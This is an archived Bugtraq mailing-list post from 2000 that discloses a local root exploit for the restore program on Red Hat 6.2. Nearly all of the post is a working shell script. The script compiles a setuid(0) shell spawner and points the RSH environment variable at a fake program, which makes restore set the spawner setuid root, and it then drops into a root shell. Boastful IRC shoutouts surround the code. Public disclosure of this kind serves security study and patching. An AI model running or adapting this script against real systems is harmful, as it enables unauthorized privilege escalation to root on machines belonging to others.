linux, säkerhet

5678198 2000-11-04 03:34 -0500  /92 rader/ fish stiqz <fish@ANALOG.ORG>
Importerad: 2000-11-04  18:53  av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: fish@ANALOG.ORG
Mottagare: Bugtraq (import) <13583>
Ärende: Redhat 6.2 restore exploit
------------------------------------------------------------
From: fish stiqz <fish@ANALOG.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.GSO.4.21.0011040330390.12231-100000@analog.org>

Well, restore has the same problem as dump..
I had hoped that these types of bugs had all been phased out by now..

-- begin --


#!/bin/sh
#
# Exploits a stupid bug in redhat 6.2's (others..) restore program.
# restore version 0.4b15 executes a program which is found in
# a user modifiable environment variable (RSH).
#
# Have fun!
#        - fish
#
# Shoutouts: trey, burke, dono, sinator, jadrax, minuway, lews, hubbs,
#	     ralph, jen, madspin, hampton, ego, als, scorch.
#
#          Cause we da pimpz of #code! (not ef/dal.. etc)
#                     (irc > irl ? werd : lame)
#
# WERD to the async, isolated, expedience, mindsong, and analog crews
#
#
# #TelcoNinjas can eat it cause they suck hardc0re
# #TelcoNinjas == #smurfkiddies
#

echo "[spl0it]: Starting."
echo -n "[spl0it]: creating shell spawn... "

echo "#include <stdio.h>"                        > cool.c
echo "int main(void) { "                        >> cool.c
echo "    setuid(0);"                           >> cool.c
echo "    setgid(0);"                           >> cool.c
echo "    execl(\"/bin/sh\", \"-bash\", NULL);" >> cool.c
echo "    return 0;"                            >> cool.c
echo "}"                                        >> cool.c

echo -e "\t\t\tdone"

echo -n "[sploit]: Compiling shell spawn... "
gcc -o cool cool.c
echo -e "\t\t\tdone"


echo -n "[sploit]: Creating fake rsh program... "

cat > execute_me << EOF
#!/bin/sh
chown root: cool
chmod 4777 cool
EOF

chmod +x execute_me
echo -e "\t\t\tdone"


# now executing the dump command
echo "[spl0it]: Beginning exploitation: "
export TAPE=garbage:garbage
export RSH=./execute_me
/sbin/restore -i


# Exec'n the r00t sh3ll!
echo -n "[spl0it]: Waiting 4 seconds for suid shell... "
sleep 4
echo -e "\t\tdone"

if [ ! -u ./cool ]; then
  echo "[spl0it]: Hmm it didn't work.. Better luck next time eh"
  echo "[spl0it]: Check ./cool anyway =)"
  exit 0
fi

echo "[spl0it]: It Worked! suid shell is now ./cool"
echo "[spl0it]: Entering suid shell..."
./cool
exit 0


-- end --

--
fish stiqz <fish@analog.org>
(5678198) ------------------------------------------